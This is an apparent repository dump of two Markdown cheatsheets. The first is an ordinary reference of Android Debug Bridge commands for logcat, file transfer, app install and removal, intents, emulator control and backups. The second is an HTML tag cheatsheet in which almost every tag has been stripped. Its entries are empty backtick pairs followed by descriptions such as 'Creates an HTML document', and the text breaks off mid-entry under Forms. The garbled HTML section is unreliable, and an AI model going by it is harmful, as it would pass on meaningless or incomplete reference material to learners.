--------------------------------------------------------------------------------
/android/adb.md:
--------------------------------------------------------------------------------
# ADB: `Cheatsheet for Android Debug Bridge`
![image](https://github.com/TechnologyMediaorg/LearnSheet/assets/111997815/770fe417-3d68-4099-b9cc-40635f9fe3b0)

## ADB Server
- `adb kill-server`
- `adb start-server`

## ADB Reboot
- `adb reboot`
- `adb reboot recovery`
- `adb reboot-bootloader`
- `adb root` // restarts ADB with root permissions

## Shell
- `adb shell` // Open or run commands in a terminal on the host Android device.

## Devices
- `adb usb`
- `adb devices` // show devices attached
- `adb devices -l` // devices (product/model)
- `adb connect ip_address_of_device`

## Get device android version
- `adb shell getprop ro.build.version.release`

## LogCat
- `adb logcat`
- `adb logcat -c` // The parameter -c will clear the current logs on the device.
- `adb logcat -d > [path_to_file]` // Save the logcat output to a file on the local system.
- `adb bugreport > [path_to_file]` // Will dump the whole device information like dumpstate, dumpsys, and logcat output.

## Files
- `adb push [source] [destination]` // Copy files from your computer to your phone.
- `adb pull [device file location] [local file location]` // Copy files from your phone to your computer.

## App install
- `adb -e install path/to/app.apk`

-d - directs command to the only connected USB device...
-e - directs command to the only running emulator...
-s ...
-p ...
The flag you decide to use has to come before the actual `adb` command:

- `adb devices | tail -n +2 | cut -sf 1 | xargs -IX adb -s X install -r com.myAppPackage` // Install the given app on all connected devices.

## Uninstalling app from device
- `adb uninstall com.myAppPackage`
- `adb uninstall `
- `adb uninstall -k ` -> "Uninstall .apk without deleting data"

- `adb shell pm uninstall com.example.MyApp`
- `adb shell pm clear [package]` // Deletes all data associated with a package.

- `adb devices | tail -n +2 | cut -sf 1 | xargs -IX adb -s X uninstall com.myAppPackage` // Uninstall the given app from all connected devices

## Update app
- `adb install -r yourApp.apk` // -r means re-install the app and keep its data on the device.
- `adb install -k <.apk file path on computer>`

## Home button
- `adb shell am start -W -c android.intent.category.HOME -a android.intent.action.MAIN`

## Activity Manager
- `adb shell am start -a android.intent.action.VIEW`
- `adb shell am broadcast -a 'my_action'`

- `adb shell am start -a android.intent.action.CALL -d tel:+972527300294` // Make a call

// Open send sms screen with phone number and the message:
- `adb shell am start -a android.intent.action.SENDTO -d sms:+972527300294 --es sms_body "Test" --ez exit_on_sent false`

// Reset permissions for an app:
- `adb shell pm reset-permissions PACKAGE_NAME`

## Emulator
- `adb emu kill`
- `adb emu kill-all`
- `adb emu ping`
- `adb emu avd name`
- `adb -s emulator-5556 emu avd name`

## WiFi
- `adb shell svc wifi enable`
- `adb shell svc wifi disable`

## Battery
- `adb shell dumpsys battery set level 50` // Set battery level to 50%

## Screen Capture
- `adb shell screencap -p /sdcard/screenshot.png` // Capture screen and save to file
- `adb pull /sdcard/screenshot.png` // Copy file from device to computer

## Package Manager
- `adb shell pm list packages`
- `adb shell pm list packages -f` // include the full path to the APK.

## SQLite database
- `adb shell sqlite3 /data/data/package_name/databases/database_name.db` // Open database shell

## Monkey
- `adb shell monkey -p your.package.name -v 500` // Send 500 pseudo-random events to your app

## Backup and Restore
- `adb backup -f backup.ab -apk com.example.app` // Backup the app and its data
- `adb restore backup.ab` // Restore the app and its data from the backup file

## Miscellaneous
- `adb shell input keyevent 26` // Press the power button
- `adb shell input keyevent 82` // Press the menu button
- `adb shell input text "Hello World"` // Input text on the device

## Resources
- [ADB Cheat Sheet](https://devhints.io/adb)

## Note
- Replace `[source]`, `[destination]`, `[path_to_file]`, `[device file location]`, `[local file location]`, `[app .apk name]`, `[package]`, `[.apk file path on computer]`, `com.myAppPackage`, `yourApp.apk`, `PACKAGE_NAME`, `your.package.name`, `backup.ab`, `com.example.app` with the actual values in your specific use case.

--------------------------------------------------------------------------------
/web/html-cheatsheet.md:
--------------------------------------------------------------------------------
# HTML Cheatsheet

## Basic Tags

` `
Creates an HTML document

` `
Sets off the title & other info that isn't displayed

` `
Sets off the visible portion of the document

` `
Puts name of the document in the title bar; when bookmarking pages, this is what is bookmarked

## Body attributes (only used in email newsletters)

``
Sets background color, using name or hex value

``
Sets text color, using name or hex value

``
Sets color of links, using name or hex value

``
Sets color of visited links, using name or hex value

``
Sets color of active links (while mouse-clicking)

## Text Tags

` `
Creates preformatted text

` ` to ` `
Creates headlines -- H1=largest, H6=smallest

` `
Creates bold text (should use `` instead)

` `
Creates italicized text (should use `` instead)

` `
Creates typewriter-style text

` `
Used to define source code, usually monospace

` `
Creates a citation, usually processed in italics

` `
Creates address section, usually processed in italics

` `
Emphasizes a word (usually processed in italics)

` `
Emphasizes a word (usually processed in bold)

` `
Sets size of font - 1 to 7 (should use CSS instead)

` `
Sets font color (should use CSS instead)

` `
Defines the font used (should use CSS instead)

## Links

`clickable text`
Creates a hyperlink to a Uniform Resource Locator

`clickable text`
Creates a hyperlink to an email address

``
Creates a target location within a document

`clickable text`
Creates a link to that target location

## Formatting

` `
Creates a new paragraph

` `
Inserts a line break (carriage return)

` `
Puts content in a quote - indents text from both sides

` `
Used to format block content with CSS

` `
Used to format inline content with CSS

## Lists

` `
Creates an unordered list

` `
Creates an ordered list (start=xx, where xx is a counting number)

` `
Encompasses each list item

` `
Creates a definition list

` `
Precedes each definition term

` `
Precedes each definition

## Graphical elements

` `
Inserts a horizontal rule

` `
Sets size (height) of horizontal rule

` `
Sets width of rule (as a % or absolute pixel length)

` `
Creates a horizontal rule without a shadow

``
Adds image; it is a separate file located at the URL

``
Aligns image left/right/center/bottom/top/middle (use CSS)

``
Sets size of border surrounding image (use CSS)

``
Sets height of image, in pixels

``
Sets width of image, in pixels

`?`
Sets the alternate text for browsers that can't process images (required by the ADA)

## Forms

` `
Defines a form

``
Creates a scrolling menu. Size sets the number of menu items visible before user needs to scroll.

``
Creates a pulldown menu

`